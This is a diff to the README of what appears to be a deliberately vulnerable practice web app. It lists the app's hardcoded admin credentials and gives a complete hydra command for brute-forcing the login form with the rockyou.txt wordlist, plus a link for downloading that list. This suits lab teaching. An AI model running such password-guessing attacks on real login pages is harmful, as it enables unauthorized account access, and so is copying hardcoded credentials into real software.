ScubaInstructor/fuh/victim-app/README.md

 Hardcoded credentials are `admin:password123`.

-you can attack its loginform with hydra using this command:
+You can attack its loginform with hydra and rockyou.txt using this command:
 `hydra -l user -P rockyou.txt <IPADRESS> -s 9999 http-post-form "/login:username=^USER^&password=^PASS^:Invalid credentials" -V`

+See [rockyou website](https://github.com/dw0rsec/rockyou.txt) for informations about and download of rockyou.txt.

-See [hydra website(https://www.kali.org/tools/hydra/)] for more information on hydra.
+See [hydra website](https://www.kali.org/tools/hydra/) for more information on hydra.